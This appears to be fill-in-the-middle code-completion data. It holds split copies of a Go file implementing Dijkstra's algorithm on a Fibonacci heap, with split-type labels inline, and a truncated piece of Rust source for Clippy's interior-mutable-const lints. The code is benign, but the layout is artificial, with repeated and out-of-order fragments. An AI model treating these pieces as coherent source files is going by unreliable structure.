if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) | () (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
}
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
}
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool {
return f.size == 0
}
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
}
| ExtractMin | identifier_name |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) ExtractMin() (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
}
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
}
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool |
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
}
| {
return f.size == 0
} | identifier_body |
full_heap.go | /**
This is Dijkstra on Fibonacci Heap realisation in one file
that solves this Codeforces Problem https://codeforces.com/contest/20/problem/C
(It gives TL but only because GO is a little slow without optimizations)
@author SeaEagle
*/
package main
import (
"errors"
"fmt"
)
func main() {
var n, m int
fmt.Scan(&n, &m)
g := Graph{Size: n}
for i := 0; i < m; i++ {
var from, to, cost int
fmt.Scan(&from, &to, &cost)
g.AddEdge(Edge{From: from, To: to, Cost: int64(cost)})
}
dist, path := ShortestPathHeap(&g, 1, n)
if dist == Inf {
fmt.Println(-1)
} else {
for _, val := range path {
fmt.Printf("%v ", val)
}
}
}
type GNode = int
type IntPair struct {
first int
second int64
}
func (i IntPair) LessThen(j interface{}) bool {
return i.second < j.(IntPair).second
}
func (i IntPair) EqualsTo(j interface{}) bool {
return i.second == j.(IntPair).second
}
func (i IntPair) MinusInf() Value {
return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) ExtractMin() (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
} |
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool {
return f.size == 0
}
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
} |
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
} | random_line_split |
non_copy_const.rs | //! Checks for uses of const which the type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks for declaration of `const` items which is interior
/// mutable (e.g., contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` should better be replaced by a `static` item if a global
/// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
///
/// ### Known problems
/// A "non-constant" const item is a legacy way to supply an
/// initialized value to downstream `static` items (e.g., the
/// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
/// and this lint should be suppressed.
///
/// Even though the lint avoids triggering on a constant whose type has enums that have variants
/// with interior mutability, and its value uses non interior mutable variants (see
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
/// it complains about associated constants without default values only based on its types;
/// which might not be preferable.
/// There're other enums plus associated constants cases that the lint cannot handle.
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
///
/// // Bad.
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub DECLARE_INTERIOR_MUTABLE_CONST,
style,
"declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks if `const` items which is interior mutable (e.g.,
/// contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.) has been borrowed directly.
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` value should be stored inside a `static` item.
///
/// ### Known problems
/// When an enum has variants with interior mutability, use of its non
/// interior mutable variants can generate false positives. See issue
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
///
/// // Bad.
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub BORROW_INTERIOR_MUTABLE_CONST,
style,
"referencing `const` with interior mutability"
}
fn is_unfrozen<'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
fn is_value_unfrozen_raw<'tcx>(
cx: &LateContext<'tcx>,
result: Result<ConstValue<'tcx>, ErrorHandled>,
ty: Ty<'tcx>,
) -> bool {
fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
match val.ty.kind() {
// the fact that we have to dig into every structs to search enums
// leads us to the point checking `UnsafeCell` directly is the only option.
ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
let val = cx.tcx.destructure_const(cx.param_env.and(val));
val.fields.iter().any(|field| inner(cx, field))
},
_ => false,
}
}
result.map_or_else(
|err| {
// Consider `TooGeneric` cases as being unfrozen.
// This causes a false positive where an assoc const whose type is unfrozen
// have a value that is a frozen variant with a generic param (an example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
// However, it prevents a number of false negatives that is, I think, important:
// 1. assoc consts in trait defs referring to consts of themselves
// (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
// 2. a path expr referring to assoc consts whose type is doesn't have
// any frozen variants in trait defs (i.e. without substitute for `Self`).
// (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
// 3. similar to the false positive above;
// but the value is an unfrozen variant, or the type has no enums. (An example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
// and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
// One might be able to prevent these FNs correctly, and replace this with `false`;
// e.g. implementing `has_frozen_variant` described above, and not running this function
// when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
// case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
// similar to 2., but with the a frozen variant) (e.g. borrowing
// `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
// I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
err == ErrorHandled::TooGeneric
},
|val| inner(cx, Const::from_value(cx.tcx, val, ty)),
)
}
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
let result = cx.tcx.const_eval_poly(body_id.hir_id.owner.to_def_id());
